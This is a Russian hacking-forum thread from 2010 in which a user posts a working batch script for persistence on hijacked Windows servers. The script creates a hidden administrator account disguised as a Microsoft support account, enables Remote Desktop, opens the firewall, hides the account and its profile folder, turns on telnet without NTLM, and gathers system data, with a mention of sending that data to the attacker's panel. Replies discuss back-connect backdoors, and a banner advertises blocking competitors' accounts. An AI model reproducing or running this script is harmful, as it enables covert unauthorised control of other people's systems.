Форум АНТИЧАТ - [EasyHack] Dedicated Servers

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > ИНФО > Статьи
[EasyHack] Dedicated Servers

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

[EasyHack] Dedicated Servers

24.03.2010, 18:49

|qbz|

Познающий

Регистрация: 25.12.2009

Сообщений: 95

Провел на форуме:
750417

Репутация: 51

[EasyHack] Dedicated Servers

Дароф ачат!

Написав недавно статейку о краже хистори из аськи + квипа, решил написать также батничек для дедиков. В батнике будут собраны все необходимые функции, в том числе:

[х] создание непалевной учетки
[х] создание из НЕ деда - деда
[х] скрытие из винлогона
[х] скрытие папки юзера
[х] сборка инфы о деде
[х] админка (или что то в этом роде)
[х] обход фаера
[х] настройка телнета на деде

Как всегда - сначал код, потом дескрайб:

Код:

set PASZ=tvoi_pass
net user SUPPORT_388945a0 /del
net user SUPPORT_388945a0 %PASZ% /add /fullname:"Microsoft Corporation" /comment:"Microsoft Windows Account" /countrycode:"000" /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup Administrators SUPPORT_388945a0 /add
net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
net accounts /maxpwage:unlimited
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0 +h +s" /f
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update software" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0.%COMPUTERNAME% +h +s" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a0 /t REG_DWORD /d 0 /f
attrib "c:\documents and settings\SUPPORT_388945a0" +h +s
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
echo Telnet started.
mkdir c:\windows\system32\infos
dxdiag /t c:\windows\system32\infos\systeminfo.txt
ipconfig>c:\windows\system32\infos\ipc.txt
start explorer.exe c:\windows\system32\infos\

Теперь обьясню что и как:

Сначала мы создаем копию юзера "саппорт".Он есть везде, так что это неименее палевный вариант.
Потом добавляем его в админы и пользователи рабочего стола.
Дальше пробуем добавит в реестр ключи, отвечающие за запуск удаленного раб. стола.
Потом добавляем в исключения фаера.
Создаем также ключ в авторане - он вызовет программу "attrib", которая поставит на папку нашего профайла атрибуты СКРЫТЫЙ и СИСТЕМНЫЙ. На многих дедушках админы ленятся ставить галочки "показывать системные файлы". Почему мы ставим в авторан? Потому что до тех пор, пока мы незалогинились в наш новый акк, папки несуществует. И скрытие произойдет сразу после логина. Это немного палевно (ключи в авторане, но если руки прямые то просто берем и добавляем в код авторана удаление данного ключа).
Далее настраиваем телнет, так как в крайнем случае, если дед не за натом а учетку удалили, то можно попробовать телнет.
Далее используем штатную утилиту dxdiag и ipconfig для сборки инфы о деде + узнать за натом он или нет. Впринципе я себе дописал еще фтп сервер, который посылает на мою админку на пхп данные 2 файла (какбы на гейт). Тот их ловит и у меня в админке все по полочкам - ИП - внешний, внутренний, системная инфа распарсена, страна (тут уже идет фича с 2ip.ru) итд итп... но это уже на ваш вкус и цвет.

Как всегда советую сделать из этого ехе и запаролить (там это реализовано пассом UPX):

Bat To Exe Converter v1.5
Setup.ico

Протестировано на огромном количестве дедов. Пока все норм.
Буду рад критике и всевозможным дополнениям. Можно совместно написать больше функции и сделать потом хороший екзе.

ГЕЙТ

Последний раз редактировалось |qbz|; 06.04.2010 в 20:47..

03.04.2010, 23:31

noxjoker

Познающий

Регистрация: 07.08.2009

Сообщений: 85

Провел на форуме:
705829

Репутация: 53

Отправить сообщение для noxjoker с помощью ICQ

|qbz| мне так интересно а если дедки за роутером. Ip не будет выделенным и на telnet ты не попадеш.

03.04.2010, 23:43

warwar

Участник форума

Регистрация: 26.05.2009

Сообщений: 219

Провел на форуме:
1646625

Репутация: 110

Отправить сообщение для warwar с помощью ICQ

Не работает в случаях, когда включен Active Directory

03.04.2010, 23:53

noxjoker

Познающий

Регистрация: 07.08.2009

Сообщений: 85

Провел на форуме:
705829

Репутация: 53

я б не использовал telnet. Если вы не хотите потерять дедик ставим бекдор))

03.04.2010, 23:57

warwar

Участник форума

Регистрация: 26.05.2009

Сообщений: 219

Провел на форуме:
1646625

Репутация: 110

Цитата:

Сообщение от noxjoker

я б не использовал telnet. Если вы не хотите потерять дедик ставим бекдор))

Дай-ка мне бекдор за NAT

04.04.2010, 00:05

noxjoker

Познающий

Регистрация: 07.08.2009

Сообщений: 85

Провел на форуме:
705829

Репутация: 53

Я б тебе дал бекдор, но увы максимум через неделю я в него пару функций внедрю и выложу в паблик.

Есть 2 вида предоставления shell-доступа:
«BindShell» — самый распространённый, работает по архитектуре «клиент-сервер», то есть бэкдор ожидает соединение.
«Back Connect» — применяется для обхода брандмауэров, бэкдор сам пытается соединиться с компьютером хакера.

Работает по принципу Back Connect.

Работает на всех Windows дедах.

04.04.2010, 00:16

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Цитата:

net localgroup Administrators SUPPORT_388945a0 /add
net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add

Аdministrators и так являются членами Remote Desktop Users.

__________________
Full DNS report

04.04.2010, 00:23

noxjoker

Познающий

Регистрация: 07.08.2009

Сообщений: 85

Провел на форуме:
705829

Репутация: 53

Azazel бывают случаи, когда в Групповые политики настроены так, что данный юзер не может добавить SUPPORT_388945a0 в Administrators, а вот в Remote Desktop Users доступ есть

Бывает редко (очень, очень) но все же.

04.04.2010, 00:39

|qbz|

Познающий

Регистрация: 25.12.2009

Сообщений: 95

Провел на форуме:
750417

Репутация: 51

Цитата:

Ip не будет выделенным и на telnet ты не попадеш.

Цитата:

если дед не за натом а учетку удалили

читай внимательнее

#10

05.04.2010, 15:26

moria4ok

Новичок

Регистрация: 04.04.2010

Сообщений: 2

Провел на форуме:
39600

Репутация: 0

Немножко не по теме, но у меня при конвертации, Bat To Exe Converter v1.5.0.0, выдает следующую ошибку:
---------------------------
Error!
---------------------------
An unknown error occured. The program will be terminated
---------------------------
ОК
---------------------------

И ничего сделать не могу!

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
BUDSF - Большой FAQ по использованию Dedicated Servers	NemeZz	Статьи	194	11.06.2010 00:30
Dedicated Servers дёшего, быстро, качественно, надёжно	BlackBoy	Хостинг, Dedicated, VDS, Сервера - Покупка, продажа	0	28.02.2010 18:04
Продажа Dedicated Servers	Max_2010	Хостинг, Dedicated, VDS, Сервера - Покупка, продажа	0	08.02.2010 21:05

TEST QR: []

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход